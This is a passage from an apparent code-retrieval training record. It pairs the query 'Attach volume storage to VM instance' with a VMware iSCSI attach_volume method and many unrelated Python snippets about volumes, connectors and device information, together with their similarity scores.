target_info['ip_list']\n\n target_portal = ips[0]\n if netutils.is_valid_ipv6(target_portal):\n target_portal = \"[%s]:3260\" % target_portal\n else:\n target_portal = \"%s:3260\" % target_portal\n\n data = {\n 'driver_volume_type': 'iscsi',\n 'data': {\n 'target_iqn': self.target_iqn,\n 'target_portal': target_portal,\n 'target_lun': lun['id'],\n 'auth_method': 'CHAP',\n 'auth_username': username,\n 'auth_password': password,\n }\n }\n return data", "def get_device_information(self):\n return self.mycam.devicemgmt.GetDeviceInformation()", "def get_volume_info(volumes):\n if type(volumes) is not list:\n volumes = [volumes]\n volume_info_list = []\n for volume in volumes:\n command = 'cinder show %s' % volume['id']\n volume_info = parse_output(Popen(command.split(), stdout=STDOUT,\n stderr=STDERR).communicate()[0])\n att = volume_info['attachments'].replace(\"'\", \"\\\"\").replace(\n \"u\\\"\", \"\\\"\").replace(\" None,\", \" \\\"None\\\",\")\n volume_info['device'] = json.loads(att)[0]['device']\n volume_info_list.append(volume_info)\n return volume_info_list", "def device_info(self):\n return {\n \"name\": self._alias,\n \"model\": self._model,\n \"manufacturer\": \"TP-Link\",\n \"connections\": {(dr.CONNECTION_NETWORK_MAC, self._mac)},\n \"sw_version\": self._sysinfo[\"sw_ver\"],\n }", "def extract_volume(self):\n\n # RDD or array of [(partition, vol)]\n vols = None\n if self.usespark:\n vols = self._retrieve_vol(self.current_spot, None)\n else:\n vols = self._retrieve_vol(self.current_spot, len(self.partitions))\n self.current_spot += len(self.partitions)\n \n return vols", "def get_ceph_drv_info():\n disks_info = []\n stat = psutil.disk_io_counters(perdisk=True)\n for drv in get_ceph_disk():\n info = CEPHDiskInfo(drv)\n disk = basename(drv)\n if disk in stat:\n info.rd_cnt = stat[disk].read_count\n info.wr_cnt = stat[disk].write_count\n info.rd_bytes = stat[disk].read_bytes\n info.wr_bytes = stat[disk].write_bytes\n info.rd_time = stat[disk].read_time\n info.wr_time = stat[disk].write_time\n\n disks_info.append(info)\n\n return disks_info", "def volumes(self):", "def get_basic_volume_info(vol_name, vl=None):\n return_dict = None\n try:\n vl, err = get_basic_volume_info_all()\n for v in vl:\n if v['name'] == vol_name:\n return_dict = v\n break\n except Exception, e:\n return None, 'Error getting basic volume information for a specific volume : %s' % str(e)\n else:\n return return_dict, None", "def _get_connector_type(self):\n\n raise NotImplementedError()", "def get_volume(self):\n return int(self.get(COMMAND_UIC, 'GetVolume')['volume'])", "def volume(self):\n return self.volume_array", "def volume(self):\n return self._volume", "def volume(self):\n return self._volume", "def get_vol_lvl(self):\n global volume\n #output = subprocess.check_output(['amixer', 'sget', self.mixer_name]).decode('utf-8')\n return volume#int(output[(output.find('[') + 1):output.find('%]', (output.find('[') + 1))])", "def src_connector(self):\n catalog = plone.api.portal.get_tool('portal_catalog')\n if not self.context.src_connectors:\n return None\n uid = self.context.src_connectors[0]\n brains = catalog(UID=uid)\n if not brains:\n return None\n return brains[0].getObject()", "def get_connect(self):\n\t\treturn self.connect", "def get_bond_info(self):\n return", "def connector(self) -> Optional[servo.Connector]:\n return self._connector", "def device_info(self) -> Dict[str, Any]:\n return {\n 'name': 'Solar Panels',\n 'identifiers': {\n (DOMAIN, self.toon.agreement.id, 'solar'),\n },\n 'via_device': (DOMAIN, self.toon.agreement.id, 'meter_adapter'),\n }", "def get_connection_info(self):\n return [(c.fullname, [u[1] for u in c.objects])\n for c in self._connections]", "def instance_connector(self):\n if '_instance_connector' not in self.__dict__:\n from meerschaum.connectors.parse import parse_instance_keys\n conn = parse_instance_keys(self.instance_keys)\n if conn:\n self._instance_connector = conn\n else:\n return None\n return self._instance_connector", "def name(self):\n return 'Connected Devices'", "def volumes(self) -> dict:\n return self.data[\"volumes\"]", "def get_connection_info(haconf=False):\n cfg = Utility.read_configuration(config=\"DEVICEDETECT\")\n\n if haconf:\n from glob import glob\n # Read one other than cfg[\"devicedb\"]\n dbs = glob(\"cache/*devices.db\")\n\n for db in dbs:\n if db != cfg[\"devicedb\"]:\n return sqlite3.connect(db), cfg[\"tablename\"]\n return sqlite3.connect(cfg[\"devicedb\"]), cfg[\"tablename\"]", "def volume(self):\n v = {'art': self._vart, 'ven': self._vven}\n if self._lvad is not None:\n v['lvad'] = self._lvad.volume['lvad']\n return v", "def volume(self):\n v = {'art': self._vart, 'ven': self._vven}\n if self._lvad is not None:\n v['lvad'] = self._lvad.volume['lvad']\n return v", "def volume(self):\n v = {'art': self._vart, 'ven': self._vven}\n if self._lvad is not None:\n v['lvad'] = self._lvad.volume['lvad']\n return v", "def get_volume(self):\n import fcntl\n import struct\n knob = bytearray(struct.pack(\"III\", 0, 0, 0)) # VOLUME_DEVICE_ID, VOLUME_KNOB_ID, <Unused>\n try:\n fcntl.ioctl(self.mixer_fd, 2, knob, True)\n _,_,value = struct.unpack(\"III\", knob)\n return value\n except:\n return 0", "def device(self):\n return self.share.device", "def get_volumes_detail(self, **kw):\n return (200, {}, {\"volumes\": [\n {'id': 1234,\n 'name': 'sample-volume for cinder',\n 'attachments': [{'server_id': 12234}]},\n {'id': 'pvcvolume',\n 'name': 'pvc sample-volume for cinder',\n 'attachments': [{'server_id': 54321}]}\n ]})", "def get_endpoint_connection_info(coriolis, barbican, endpoint):\n endpoint_conn_info = coriolis.endpoints.get(endpoint).to_dict().get(\n 'connection_info')\n\n if 'secret_ref' not in endpoint_conn_info:\n # this endpoint is not using Barbican for secret storage:\n return endpoint_conn_info\n\n secret = barbican.secrets.get(endpoint_conn_info['secret_ref'])\n\n return json.loads(secret.payload)", "def connected_endpoint(self):\n try:\n if self._connected_poweroutlet:\n return self._connected_poweroutlet\n except ObjectDoesNotExist:\n pass\n try:\n if self._connected_powerfeed:\n return self._connected_powerfeed\n except ObjectDoesNotExist:\n pass\n return None", "def volume(self):\n vol = None\n if self._mixer:\n vol = self._mixer.getvolume()\n return vol", "def getComponentVolume(self):\n lengthO = self.getDimension(\"lengthOuter\")\n widthO = self.getDimension(\"widthOuter\")\n heightO = self.getDimension(\"heightOuter\")\n lengthI = self.getDimension(\"lengthInner\")\n widthI = self.getDimension(\"widthInner\")\n heightI = self.getDimension(\"heightInner\")\n mult = self.getDimension(\"mult\")\n vol = mult * (lengthO * widthO * heightO - lengthI * widthI * heightI)\n return vol", "def volume(self):\n return [node.volume for node in self]", "def get(self, cid):\n if cid not in self.connectors:\n self.connectors[cid] = ClientConnectorStatistics(cid)\n\n return self.connectors[cid]", "def device_info(self):\n return {\n \"connections\": {(CONNECTION_NETWORK_MAC, self._mac)},\n \"default_name\": self._device_name,\n \"default_model\": self._device[\"device_model\"],\n \"via_device\": (DOMAIN, self._router.unique_id),\n }", "def get_volume_info(self):\n if self.issue:\n return f\"{self.volume} ({self.issue}), {self.pages}\"\n else:\n return f\"{self.volume}, {self.pages}\"", "def volume(self):\n return _cantera.reactor_volume(self.__reactor_id)", "def channelinfo(self):\n\n return ChannelInfo(\n self._filetextbox.text(),\n self._idtextbox.text(),\n self._datafilebox.text()\n )", "def connect_volume(self, connection_properties, scan_tries):\n device_info = {'type': 'block'}\n\n # TODO(Strony): support the iSCSI multipath on Solaris.\n self._connect_to_iscsi_portal(connection_properties)\n\n host_device = self._get_device_path(connection_properties)\n\n # check if it is a valid device path.\n for i in range(1, scan_tries):\n if os.path.exists(host_device):\n break\n else:\n time.sleep(i ** 2)\n else:\n raise exception.VolumeDeviceNotFound(device=host_device)\n\n # Set the label EFI to the disk on SPARC before it is accessed and\n # make sure the correct device path with slice 0\n # (like '/dev/rdsk/c0t600xxxd0s0').\n if platform.processor() == 'sparc':\n tmp_dev_name = host_device.rsplit('s', 1)\n disk_name = tmp_dev_name[0].split('/')[-1]\n (out, _err) = self.execute('/usr/sbin/format', '-L', 'efi', '-d',\n disk_name)\n host_device = '%ss0' % tmp_dev_name[0]\n\n device_info['path'] = host_device\n return device_info", "def list_volumes(self):\n\n print(self.format_string % (\"OpenStack Volume\", \"ScaleIO Name\", \"ScaleIO ID\", \"Attached\"))\n for os_volume in self.openstack.block_store.volumes(details=True,\n all_tenants=self.args.OS_ALL_TENANTS):\n sio_volume = self._convert_os_to_sio(os_volume.id)\n try:\n vol_id = self.scaleio.get_volumeid(sio_volume)\n if vol_id is not None:\n attached = 'True'\n if not os_volume.attachments:\n attached = 'False'\n print(self.format_string % (os_volume.id, sio_volume, vol_id, attached))\n except:\n # if we got here, there is no SIO volume for the openstack volume\n pass", "def get_connector(self, connector_id):\n if connector_id == \"\":\n raise ValueError(\"No value specified for connector_id\")\n endpoint = self.api_path_connectors + connector_id\n resp = self._do_api_call((\"GET\", endpoint))\n return resp[\"data\"]", "def GetHandle(self):\n return _XCAFDoc.XCAFDoc_Volume_GetHandle(self)", "def device_info(self) -> DeviceInfo:\n return DeviceInfo(\n identifiers={(DOMAIN, self.unique_id)},\n manufacturer=\"Volumio\",\n model=self._info[\"hardware\"],\n name=self._name,\n sw_version=self._info[\"systemversion\"],\n )", "def get_volume_info(self, uid):\n LOG.debug(\"Entering\")\n cmd = \"svcinfo lsvdisk -bytes -filtervalue vdisk_UID=%s -delim :\" % uid\n output = self._svc_command(cmd)[0]\n\n if len(output) != 2:\n raise SVCVolumeNotFound(\n _(\"Couldn't find volume information for UID %s\") % uid)\n\n header = output[0].split(':')\n values = output[1].split(':')\n index = header.index(SVC_KEY_VDISK_ID)\n diskId = values[index]\n index = header.index(SVC_KEY_VDISK_NAME)\n name = values[index]\n index = header.index(SVC_KEY_VOLUME_GROUP)\n volumeGroup = values[index]\n index = header.index(SVC_KEY_VDISK_CAPACITY)\n capacity = values[index]\n\n info = {SVC_KEY_VDISK_ID: diskId,\n SVC_KEY_VDISK_NAME: name,\n SVC_KEY_VOLUME_GROUP: volumeGroup,\n SVC_KEY_VDISK_CAPACITY: capacity}\n\n LOG.debug(\"Exiting\")\n return info", "def get(self, cid):\n if cid not in self.connectors:\n self.connectors[cid] = ServerConnectorStatistics(cid)\n\n return self.connectors[cid]", "def vpc_connector_name(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"vpc_connector_name\")", "def device_information(self):\n return self._device_information", "def get_radio_info(self):\n return self.get(COMMAND_CPM, 'GetRadioInfo')", "def target_connector(self):\n catalog = plone.api.portal.get_tool('portal_catalog')\n if not self.context.target_connector:\n return None\n uid = self.context.target_connector\n brains = catalog(UID=uid)\n if not brains:\n return None\n return brains[0].getObject()", "def device_info(self) -> interface.DeviceInfo:\n return self._device_info", "def getComponentVolume(self, cold=False):\n od = self.getDimension(\"od\", cold=cold)\n iD = self.getDimension(\"id\", cold=cold)\n mult = self.getDimension(\"mult\")\n vol = mult * 4.0 / 3.0 * math.pi * ((od / 2.0) ** 3 - (iD / 2.0) ** 3)\n return vol", "def get_boot_device(self):\n root_vol = None\n boot_vol = None\n for volume in self.volumes:\n if not volume.partitions:\n continue\n for partition in volume.partitions:\n if partition.mount_point == \"/\":\n root_vol = volume\n elif partition.mount_point == '/boot':\n boot_vol = volume\n\n if not boot_vol:\n return root_vol\n return boot_vol", "def get_volume(self, volume):\n return self._get(_volume.Volume, volume)", "def get_volumes(self):\n url = self._get_url() + 'volumes'\n volumes = self._request(url)\n return volumes.json()", "def get_channels(self):\n bus_name = self.telepathy_conn.requested_bus_name\n connection_path = self.telepathy_conn.object_path\n channels = [self.telepathy_text_chan.object_path,\n self.telepathy_tubes_chan.object_path]\n\n print('%r: bus name is %s, connection is %s, channels are %r',\n self, bus_name, connection_path, channels)\n return bus_name, connection_path, channels", "def device_info(self):\n return {\n \"name\": get_device_name(self._data, self._actuator.id),\n \"identifiers\": {(DOMAIN, get_identifier(self._data, self._actuator.id))},\n \"via_device\": (DOMAIN, self._data.wiserhub.system.name),\n }", "def list_volumes(self):\n print '# Listing existing volumes'\n self.compute.list_volumes()", "def get_device(self):\n return self.parent.get_device()", "def info(self) -> ConnectionInfo:\n return ConnectionInfo(self.pgconn)", "def bdev_opal_get_info(client, bdev_name, password):\n params = {\n 'bdev_name': bdev_name,\n 'password': password,\n }\n\n return client.call('bdev_opal_get_info', params)", "def getChannel(self):\r\n return self.channel", "def return24hVolume(self):\n pass", "def GetFATVolume(self):\n return self._fsfat_volume", "def return24Volume(self):\n v = self.dpay.rpc.get_volume(api=\"market_history\")\n return {'bbd_volume': v[\"bbd_volume\"],\n 'dpay_volume': v[\"dpay_volume\"]}", "def get_catalog(self) -> Dict[str, str]:\n return self.catalog", "def get_version_info(self):\n return self._jadeRpc('get_version_info')", "def Volume(self, default=None):\n return self.data.get('volume', default)", "def get_definition(self):\n return self.client._perform_json(\n \"GET\", \"/admin/connections/%s\" % self.name)", "def get_vdw_info(self):\n return", "def create_test_volume_connector(**kw):\n connector = get_test_volume_connector(**kw)\n # Let DB generate ID if it isn't specified explicitly\n if 'id' not in kw:\n del connector['id']\n dbapi = db_api.get_instance()\n return dbapi.create_volume_connector(connector)", "def get_coulomb_info(self):\n return", "def source_connections_info(self) -> pulumi.Output[Sequence['outputs.MapperSourceConnectionsInfoResponse']]:\n return pulumi.get(self, \"source_connections_info\")", "def get_info(volpath):\n dhandle = vol_open_path(volpath, VMDK_OPEN_DISKCHAIN_NOIO)\n\n if not disk_is_valid(dhandle):\n logging.warning(\"Failed to open disk - %s\", volpath)\n return None\n\n sinfo = disk_info()\n res = lib.DiskLib_GetSize(dhandle, 0, VMDK_MAX_SNAPS, byref(sinfo))\n\n lib.DiskLib_Close(dhandle)\n if res != 0:\n logging.warning(\"Failed to get size of disk %s - %x\", volpath, res)\n return None\n\n return {VOL_SIZE: convert(sinfo.size), VOL_ALLOC: convert(sinfo.allocated)}", "def send_connection_information(self):\n return self.connection_information", "def show_asm_volumes(self):\n sql = \"select NAME from v$asm_diskgroup_stat ORDER BY 1\"\n self.cur.execute(sql)\n res = self.cur.fetchall()\n key = ['{#ASMVOLUME}']\n lst = []\n for i in res:\n d = dict(zip(key, i))\n lst.append(d)\n print(json.dumps({'data': lst}))", "def get_device_info(handle, timeout):\n device_info = dict()\n device_info['ls'] = ceph_mon_command(handle, 'device ls', timeout)\n\n return device_info", "def connector(self) -> DatabaseConnector:\n return self._connector" ]
[ "0.6858231", "0.6418148", "0.62130344", "0.60607785", "0.6042523", "0.58188075", "0.5792801", "0.5697431", "0.55846596", "0.55579096", "0.5506042", "0.5469819", "0.5426191", "0.5425665", "0.54218316", "0.5421626", "0.54012877", "0.53762865", "0.53762865", "0.5360571", "0.53501505", "0.5332365", "0.5330535", "0.53274167", "0.53186363", "0.53176093", "0.5315009", "0.53113294", "0.53073996", "0.5284102", "0.5278957", "0.52763486", "0.52759343", "0.52759343", "0.522144", "0.52085024", "0.51789206", "0.5178361", "0.51680547", "0.51636416", "0.5152914", "0.5152556", "0.5119858", "0.51178634", "0.5101588", "0.51011974", "0.51011974", "0.51011974", "0.50988334", "0.5084045", "0.5082255", "0.50817734", "0.5080451", "0.50657195", "0.5046491", "0.50421906", "0.5038505", "0.5032082", "0.50226", "0.502248", "0.50211793", "0.50165826", "0.5015893", "0.500574", "0.5004417", "0.49822202", "0.4974005", "0.49674514", "0.49643338", "0.49638316", "0.49628916", "0.49596903", "0.49498087", "0.49457598", "0.49327052", "0.492473", "0.4914411", "0.49093214", "0.49063042", "0.4903671", "0.49005064", "0.48999277", "0.48978388", "0.4897364", "0.48940715", "0.4886816", "0.4880167", "0.4876698", "0.48736116", "0.48703942", "0.4864784", "0.4859031", "0.482534", "0.4823711", "0.48224857", "0.48137128", "0.48105088", "0.48066562", "0.48055357", "0.4804674" ]
0.7179875
0
Attach volume storage to VM instance.
def attach_volume(self, connection_info, instance, mountpoint): instance_name = instance['name'] vm_ref = vm_util.get_vm_ref_from_name(self._session, instance_name) if vm_ref is None: raise exception.InstanceNotFound(instance_id=instance_name) # Attach Volume to VM LOG.debug(_("Attach_volume: %(connection_info)s, %(instance_name)s, " "%(mountpoint)s") % locals()) driver_type = connection_info['driver_volume_type'] if driver_type not in ['iscsi']: raise exception.VolumeDriverNotFound(driver_type=driver_type) data = connection_info['data'] mount_unit = volume_util.mountpoint_to_number(mountpoint) # Discover iSCSI Target device_name, uuid = self.discover_st(data) if device_name is None: raise volume_util.StorageError(_("Unable to find iSCSI Target")) # Get the vmdk file name that the VM is pointing to hardware_devices = self._session._call_method(vim_util, "get_dynamic_property", vm_ref, "VirtualMachine", "config.hardware.device") vmdk_file_path, controller_key, adapter_type, disk_type, unit_number \ = vm_util.get_vmdk_path_and_adapter_type(hardware_devices) # Figure out the correct unit number if unit_number < mount_unit: unit_number = mount_unit else: unit_number = unit_number + 1 self.attach_disk_to_vm(vm_ref, instance_name, adapter_type, disk_type="rdmp", controller_key=controller_key, unit_number=unit_number, device_name=device_name) LOG.info(_("Mountpoint %(mountpoint)s attached to " "instance %(instance_name)s") % locals())
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def attach_volume(self, context, connection_info, instance, mountpoint,\n disk_bus=None, device_type=None, encryption=None):", "def attach_volume(self):\n\n # Choose volume\n volume_id = self._choose_among_available_volumes()\n\n # Cancel\n if not volume_id:\n print 'Operation cancelled'\n return\n\n # Choose instance\n instance_id = self._choose_among_running_instances()\n\n # Cancel\n if not instance_id:\n print 'Operation cancelled'\n return\n\n # Attach the volume\n print '# Attaching volume \"%s\"!' % volume_id\n if self.compute.attach_volume(volume_id, instance_id):\n print 'The volume has been attached!'\n else:\n print 'The volume could not been attached'", "def attach_volume(self, context, connection_info, instance, mountpoint,\n disk_bus=None, device_type=None, encryption=None):\n data = connection_info['data']\n vm = self._get_instance(instance.uuid)\n data_disks = vm.storage_profile.data_disks\n luns = [i.lun for i in data_disks]\n new_lun = 1\n # azure allow upto 16 extra datadisk, 1 os disk + 1 ephemeral disk\n # ephemeral disk will always be sdb for linux.\n for i in range(1, 16):\n if i not in luns:\n new_lun = i\n break\n else:\n msg = 'Can not attach volume, exist volume amount upto 16.'\n LOG.error(msg)\n raise nova_ex.NovaException(msg)\n disk = self.disks.get(CONF.azure.resource_group, data['disk_name'])\n managed_disk = dict(id=disk.id)\n data_disk = dict(lun=new_lun,\n name=data['disk_name'],\n managed_disk=managed_disk,\n create_option='attach')\n data_disks.append(data_disk)\n self._create_update_instance(instance, vm)\n LOG.info(_LI(\"Attach Volume to Instance in Azure finish\"),\n instance=instance)", "def attach_volume(self, instance_name, device_path, mountpoint):\n return True", "def attach_volume(self,\n context,\n connection_info,\n instance,\n mountpoint,\n disk_bus=None,\n device_type=None,\n encryption=None):\n\n def _check_available_lun(data_disks):\n # We can attach upto 16 data disks to an instance\n luns = [i.lun for i in data_disks]\n for i in range(1, 16):\n if i not in luns:\n return i\n raise Exception(\"Could not attach volume\")\n\n volume_data = connection_info['data']\n azure_name = self._get_omni_name_from_instance(instance)\n azure_instance = utils.get_instance(\n self.compute_client, drv_conf.resource_group, azure_name)\n data_disks = azure_instance.storage_profile.data_disks\n lun = _check_available_lun(data_disks)\n name = volume_data['name']\n id = volume_data['id']\n data_disk = {\n 'name': name,\n 'create_option': 'attach',\n 'lun': lun,\n 'managed_disk': {\n 'id': id\n }\n }\n data_disks.append(data_disk)\n utils.create_or_update_instance(self.compute_client,\n drv_conf.resource_group, azure_name,\n azure_instance)\n LOG.info(\"Attached volume %s to instance %s\" % (name, instance.uuid))", "def attach_volume(self, host_path: str, container_path: str, mode: str = None):\n self.volumes[host_path] = {\n \"bind\": container_path,\n \"mode\": mode or \"Z\"\n }", "def attach(self, instance_id, device):\r\n return self.connection.attach_volume(self.id, instance_id, device)", "def attach(self, node, device=None):\r\n\r\n return self.driver.attach_volume(node=node, volume=self, device=device)", "def attach(**_):\n\n volume_id = \\\n utils.get_external_resource_id_or_raise(\n 'attach volume', ctx.source.instance)\n instance_id = \\\n utils.get_external_resource_id_or_raise(\n 'attach volume', ctx.target.instance)\n\n if ctx.source.node.properties[constants.ZONE] not in \\\n ctx.target.instance.runtime_properties.get('placement'):\n ctx.logger.info(\n 'Volume Zone {0} and Instance Zone {1} do not match. '\n 'This may lead to an error.'.format(\n ctx.source.node.properties[constants.ZONE],\n ctx.target.instance.runtime_properties.get('placement')\n )\n )\n\n if _attach_external_volume_or_instance(instance_id):\n return\n\n volume_object = _get_volumes_from_id(volume_id)\n\n if not volume_object:\n raise NonRecoverableError(\n 'EBS volume {0} not found in account.'.format(volume_id))\n\n if constants.VOLUME_CREATING in volume_object.update():\n return ctx.operation.retry(\n message='Waiting for volume to be ready. '\n 'Volume in state {0}'\n .format(volume_object.status))\n elif constants.VOLUME_AVAILABLE not in volume_object.update():\n raise NonRecoverableError(\n 'Cannot attach Volume {0} because it is in state {1}.'\n .format(volume_object.id, volume_object.status))\n\n ctx.logger.debug(\n 'Attempting to attach volume {0} to instance {1}.'\n .format(volume_id, instance_id))\n\n try:\n volume_object.attach(\n instance_id,\n ctx.source.node.properties['device'])\n except (boto.exception.EC2ResponseError,\n boto.exception.BotoServerError) as e:\n raise NonRecoverableError('{0}'.format(str(e)))\n\n ctx.source.instance.runtime_properties['instance_id'] = \\\n instance_id\n ctx.logger.info(\n 'Attached EBS volume {0} with instance {1}.'\n .format(volume_id, instance_id))", "def attach_volume(\n self,\n volume: Union[dto.Volume, str],\n machine: Union[dto.Machine, str]\n ) -> dto.Volume:\n raise errors.UnsupportedOperationError(\n \"Operation not supported for provider '{}'\".format(self.provider_name)\n )", "def attach_volume(self, volume_id, instance_id, device):\r\n params = {'InstanceId' : instance_id,\r\n 'VolumeId' : volume_id,\r\n 'Device' : device}\r\n return self.get_status('AttachVolume', params, verb='POST')", "def test_pvcvolume_attach(self):\n v = self.cs.volumes.get('pvcvolume')\n self.cs.volumes.attach(v, 1, '/dev/vdc')\n self.cs.assert_called('POST',\n '/volumes/pvcvolume/action')", "def attach_volume(self, volume, device=\"/dev/sdp\"):\r\n if hasattr(volume, \"id\"):\r\n volume_id = volume.id\r\n else:\r\n volume_id = volume\r\n return self.ec2.attach_volume(volume_id=volume_id, instance_id=self.instance_id, device=device)", "def AttachVolume(self, request, global_params=None):\n config = self.GetMethodConfig('AttachVolume')\n return self._RunMethod(\n config, request, global_params=global_params)", "def attach_volume(self, context, volume_id, instance_uuid, host_name,\n mountpoint, mode):\n @utils.synchronized(volume_id, external=True)\n def do_attach():\n # check the volume status before attaching\n volume = self.db.volume_get(context, volume_id)\n volume_metadata = self.db.volume_admin_metadata_get(\n context.elevated(), volume_id)\n if volume['status'] == 'attaching':\n if (volume['instance_uuid'] and volume['instance_uuid'] !=\n instance_uuid):\n msg = _(\"being attached by another instance\")\n raise exception.InvalidVolume(reason=msg)\n if (volume['attached_host'] and volume['attached_host'] !=\n host_name):\n msg = _(\"being attached by another host\")\n raise exception.InvalidVolume(reason=msg)\n if (volume_metadata.get('attached_mode') and\n volume_metadata.get('attached_mode') != mode):\n msg = _(\"being attached by different mode\")\n raise exception.InvalidVolume(reason=msg)\n elif volume['status'] != \"available\":\n msg = _(\"status must be available\")\n raise exception.InvalidVolume(reason=msg)\n # TODO(jdg): attach_time column is currently varchar\n # we should update this to a date-time object\n # also consider adding detach_time?\n self.db.volume_update(context, volume_id,\n {\"instance_uuid\": instance_uuid,\n \"mountpoint\": mountpoint,\n \"attached_host\": host_name\n })\n\n self.db.volume_admin_metadata_update(context.elevated(),\n volume_id,\n {\"attached_mode\": mode},\n False)\n return do_attach()", "def test_manage_volume_attachments(self, volume, instance, volumes_steps):\n volumes_steps.attach_instance(volume.name, instance.name)\n volumes_steps.detach_instance(volume.name, instance.name)", "def attach_volume(self, instance_id, volume_id, device):\n response = volume.attach_volume(self.url, self.verb, self.headers,\n self.version, instance_id, volume_id, device)\n if response is not None :\n res = AttachVolumeResponse.AttachVolumeResponse()\n parseString(str(response.text), res)\n return res\n else :\n return None", "def attach_volume(self, server, volume, device=None, tag=None,\n wait_for_detach=True):\n attach_kwargs = dict(volumeId=volume['id'])\n if device:\n attach_kwargs['device'] = device\n if tag:\n attach_kwargs['tag'] = tag\n\n attachment = self.servers_client.attach_volume(\n server['id'], **attach_kwargs)['volumeAttachment']\n\n # NOTE(lyarwood): During attach we initially wait for the volume\n # attachment and then check the volume state.\n waiters.wait_for_volume_attachment_create(\n self.volumes_client, volume['id'], server['id'])\n # TODO(lyarwood): Remove the following volume status checks and move to\n # attachment status checks across all volumes now with the 3.27\n # microversion somehow.\n if not volume['multiattach']:\n waiters.wait_for_volume_resource_status(\n self.volumes_client, volume['id'], 'in-use')\n\n # NOTE(lyarwood): On teardown (LIFO) initially wait for the volume\n # attachment in Nova to be removed. While this technically happens last\n # we want this to be the first waiter as if it fails we can then dump\n # the contents of the console log. The final check of the volume state\n # should be a no-op by this point and is just added for completeness\n # when detaching non-multiattach volumes.\n if not volume['multiattach'] and wait_for_detach:\n self.addCleanup(\n waiters.wait_for_volume_resource_status, self.volumes_client,\n volume['id'], 'available')\n self.addCleanup(\n waiters.wait_for_volume_attachment_remove_from_server,\n self.servers_client, server['id'], volume['id'])\n self.addCleanup(self._detach_volume, server, volume)\n\n return attachment", "def attach(self):\n log.info('Adding volume {0} ({1})...'.format(\n self.volume_id, self.fs.get_full_name()))\n # Bail if the volume doesn't exist, or is already attached\n if self.status == volume_status.NONE or self.status == volume_status.DELETING:\n log.error('Attempt to attach non-existent volume {0}'.format(\n self.volume_id))\n return None\n elif self.status == volume_status.ATTACHED or self.status == volume_status.IN_USE:\n log.debug('Volume {0} already attached as {1}'.format(\n self.volume_id, self.device))\n return self.device\n\n # Wait for the volume to become available\n if self.from_snapshot_id and self.status == volume_status.CREATING:\n # Eucalyptus can take an inordinate amount of time to create a\n # volume from a snapshot\n log.debug(\"Waiting for volume to be created from a snapshot...\")\n if not self.wait_for_status(volume_status.AVAILABLE):\n log.error('Volume never reached available from creating status. Status is {0}'.format(\n self.status))\n elif self.status != volume_status.AVAILABLE:\n if not self.wait_for_status(volume_status.AVAILABLE):\n log.error('Volume never became available to attach. Status is {0}'.format(\n self.status))\n return None\n\n # attempt to attach\n for attempted_device in self._get_likely_next_devices():\n pre_devices = self._get_device_list()\n log.debug(\n 'Before attach, devices = {0}'.format(' '.join(pre_devices)))\n if self._do_attach(attempted_device):\n if self.wait_for_status(volume_status.ATTACHED):\n time.sleep(10) # give a few seconds for the device to show up in the OS\n post_devices = self._get_device_list()\n log.debug('After attach, devices = {0}'.format(\n ' '.join(post_devices)))\n new_devices = post_devices - pre_devices\n log.debug('New devices = {0}'.format(' '.join(new_devices)))\n if len(new_devices) == 0:\n log.debug('Could not find attached device for volume {0}. Attempted device = {1}'\n .format(self.volume_id, attempted_device))\n elif attempted_device in new_devices:\n self.device = attempted_device\n return attempted_device\n elif len(new_devices) > 1:\n log.error(\"Multiple devices (%s) added to OS during process, \"\n \"and none are the requested device. Can't determine \"\n \"new device. Aborting\" % ', '.join(new_devices))\n return None\n else:\n device = tuple(new_devices)[0]\n self.device = device\n log.debug(\"For {0}, set self.device to {1}\".format(\n self.fs.get_full_name(), device))\n return device\n # requested device didn't attach, for whatever reason\n if self.status != volume_status.AVAILABLE and attempted_device[-3:-1] != 'vd':\n self.detach() # in case it attached invisibly\n self.wait_for_status(volume_status.AVAILABLE, 60)\n return None # no device properly attached", "def AttachDisk(self, disk: 'AZComputeDisk') -> None:\n vm = self.compute_client.virtual_machines.get(\n self.resource_group_name, self.name)\n data_disks = vm.storage_profile.data_disks\n # ID to assign to the data disk to attach\n lun = 0 if len(data_disks) == 0 else len(data_disks) + 1\n\n update_data = {\n 'lun': lun,\n 'name': disk.name,\n 'create_option': models.DiskCreateOption.attach,\n 'managed_disk': {'id': disk.resource_id}\n }\n\n data_disks.append(update_data)\n\n try:\n request = self.compute_client.virtual_machines.begin_update(\n self.resource_group_name, self.name, vm)\n while not request.done():\n sleep(5) # Wait 5 seconds before checking vm status again\n except azure_exceptions.CloudError as exception:\n raise RuntimeError(\n 'Could not attach disk {0:s} to instance {1:s}: {2:s}'.format(\n disk.name, self.name, str(exception))) from exception", "def attach_volume(self, server, volume, device=None, tag=None):\n attach_kwargs = dict(volumeId=volume['id'])\n if device:\n attach_kwargs['device'] = device\n if tag:\n attach_kwargs['tag'] = tag\n\n attachment = self.servers_client.attach_volume(\n server['id'], **attach_kwargs)['volumeAttachment']\n # On teardown detach the volume and for multiattach volumes wait for\n # the attachment to be removed. For non-multiattach volumes wait for\n # the state of the volume to change to available. This is so we don't\n # error out when trying to delete the volume during teardown.\n if volume['multiattach']:\n att = waiters.wait_for_volume_attachment_create(\n self.volumes_client, volume['id'], server['id'])\n self.addCleanup(waiters.wait_for_volume_attachment_remove,\n self.volumes_client, volume['id'],\n att['attachment_id'])\n else:\n self.addCleanup(waiters.wait_for_volume_resource_status,\n self.volumes_client, volume['id'], 'available')\n waiters.wait_for_volume_resource_status(self.volumes_client,\n volume['id'], 'in-use')\n # Ignore 404s on detach in case the server is deleted or the volume\n # is already detached.\n self.addCleanup(self._detach_volume, server, volume)\n return attachment", "def add_vm_with_disk(request, storage):\n self = request.node.cls\n\n def finalizer():\n assert ll_vms.safely_remove_vms(\n [self.test_vm_name]\n ), \"Unable to remove VM %s\" % self.test_vm_name\n\n request.addfinalizer(finalizer)\n self.vm_names = list()\n self.test_vm_name = storage_helpers.create_unique_object_name(\n self.__name__, config.OBJECT_TYPE_VM\n )\n vm_args = config.create_vm_args.copy()\n vm_args['vmName'] = self.test_vm_name\n vm_args['storageDomainName'] = self.storage_domain\n\n testflow.setup(\"Creating VM %s\", self.test_vm_name)\n assert storage_helpers.create_vm_or_clone(**vm_args), (\n \"Failed to create VM %s\" % self.test_vm_name\n )\n self.vm_names.append(self.test_vm_name)\n\n testflow.setup(\n \"Attaching disk %s to VM %s\", self.disk_name, self.test_vm_name\n )\n assert ll_disks.attachDisk(True, self.disk_name, self.test_vm_name), (\n \"Failed to attach 